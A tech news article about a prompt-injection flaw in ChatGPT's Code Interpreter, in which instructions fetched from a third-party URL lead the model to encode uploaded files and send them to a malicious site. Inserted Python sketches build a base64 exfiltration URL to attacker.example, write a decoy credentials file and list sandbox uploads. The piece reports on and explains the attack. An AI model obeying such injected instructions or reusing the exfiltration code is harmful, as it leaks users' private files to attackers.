ChatGPT's new code interpreting tool could become a hacker's paradise. Here's how.

ChatGPT privacy settings
(Image credit: Future)

What you need to know

  • ChatGPT Plus members can now access a Code Interpreter tool with sophisticated coding capabilities, writing Python code with the help of AI and running it in a sandboxed environment.
  • A security expert has disclosed that the new feature potentially poses a significant security threat to users.
  • Because uploaded files share that sandbox with AI-generated code, hackers have an avenue to maliciously access your data.
  • The technique involves tricking ChatGPT into executing instructions from a third-party URL, prompting it to encode uploaded files into a string and send that data to a malicious site.

For a while now, we've known ChatGPT can achieve incredible things and make work easier for users, from developing software in under 7 minutes to solving complex math problems and more. While it's already possible to write code using the tool, OpenAI recently debuted a new Code Interpreter tool, making the process more seamless.

According to Tom's Hardware and cybersecurity expert Johann Rehberger, the tool writes Python code with the help of AI and even runs it in a sandboxed environment. And while this is an incredible feat, the sandboxed environment is a hornet's nest for attackers.

This is mainly because the same sandbox also handles any spreadsheets or other files you upload for ChatGPT to analyze and present as charts, ultimately making that data susceptible to malicious ploys by hackers.

How do hackers leverage this vulnerability?

Per Johann Rehberger's findings and Tom's Hardware's in-depth tests and analysis, the technique involves duping the AI-powered chatbot into executing instructions from a third-party URL. This allows it to encode uploaded files into a string and send that information to a malicious site.
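To make the mechanics concrete, here is a minimal sketch of what injected instructions could make the sandbox do: read an uploaded file, encode its contents into a URL-safe string, and embed that string in a request to the attacker's server. The function name, the `attacker.example` collector URL, and the choice of base64 encoding are illustrative assumptions, not details confirmed by the report.

```python
# Hypothetical sketch of the exfiltration step described above.
# "attacker.example" is a placeholder domain; the encoding scheme
# (base64) is an assumption -- any string encoding would work.
import base64
from pathlib import Path

def build_exfil_url(file_path: str,
                    collector: str = "http://attacker.example/collect") -> str:
    """Encode a file's contents into a URL-safe string and append it
    as a query parameter -- the 'string' the article describes."""
    data = Path(file_path).read_bytes()
    encoded = base64.urlsafe_b64encode(data).decode("ascii")
    return f"{collector}?data={encoded}"

# A single request to this URL (e.g. via urllib) would hand the file's
# contents to the attacker's server; the request itself is omitted here.
```

The key point is that nothing in this snippet looks malicious in isolation: reading files and building URLs are exactly the operations the sandbox exists to perform.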

This is highly concerning, even though the technique calls for particular conditions. For starters, you'll require a ChatGPT Plus subscription to access the code-interpreting tool at all.

RELATED: OpenAI temporarily restricts new sign-ups for its ChatGPT Plus service

While trying to replicate this technique, Tom's Hardware gauged the extent of the vulnerability by creating a fake environment-variables file and leveraging ChatGPT's capabilities to process and send its contents to an external malicious site.
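An illustrative recreation of that test setup might look like the following: a decoy `.env` file seeded with dummy secrets of the kind an attacker would hope to capture. Every variable name and value here is invented for illustration; the report does not specify the file's actual contents.

```python
# Decoy environment-variables file for testing exfiltration, with
# obviously fake values -- never use real credentials in such a test.
from pathlib import Path

def write_fake_env(path: str) -> str:
    """Write a fake .env file to `path` and return its contents."""
    contents = "\n".join([
        "AWS_ACCESS_KEY_ID=AKIA_FAKE_EXAMPLE_KEY",
        "AWS_SECRET_ACCESS_KEY=fake/secret/value",
        "DB_PASSWORD=not-a-real-password",
    ]) + "\n"
    Path(path).write_text(contents)
    return contents
```

Uploading a file like this lets a researcher confirm whether the injected instructions really forwarded the data, without risking genuine credentials.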

Uploaded files land on a new Linux virtual machine with a dedicated directory structure. While ChatGPT doesn't provide a command line, it responds to Linux commands typed into the chat, allowing users to list and access the files. Through this avenue, hackers can reach unsuspecting users' data.
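Since the Code Interpreter executes Python, the same enumeration can be done without a shell at all. The sketch below assumes the sandbox's conventional upload directory `/mnt/data` (the path widely reported for ChatGPT's interpreter); the function name is my own.

```python
# Minimal sketch: walk the sandbox's upload directory and list every
# file an injected prompt could enumerate. "/mnt/data" is an assumed
# default based on public reports, not an officially documented path.
import os

def list_sandbox_files(root: str = "/mnt/data") -> list[str]:
    """Recursively collect file paths under `root`, sorted for display."""
    found = []
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            found.append(os.path.join(dirpath, name))
    return sorted(found)
```

A benign analysis session and a prompt-injection attack would both start from exactly this kind of listing, which is why the behavior is so hard to police.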

Is it possible to completely block hackers from leveraging AI capabilities to deploy attacks on unsuspecting users? Please share your thoughts with us in the comments. 

Kevin Okemwa
Contributor

Kevin Okemwa is a seasoned tech journalist based in Nairobi, Kenya with lots of experience covering the latest trends and developments in the industry at Windows Central. With a passion for innovation and a keen eye for detail, he has written for leading publications such as OnMSFT, MakeUseOf, and Windows Report, providing insightful analysis and breaking news on everything revolving around the Microsoft ecosystem. You'll also catch him occasionally contributing at iMore about Apple and AI. While AFK and not busy following the ever-emerging trends in tech, you can find him exploring the world or listening to music.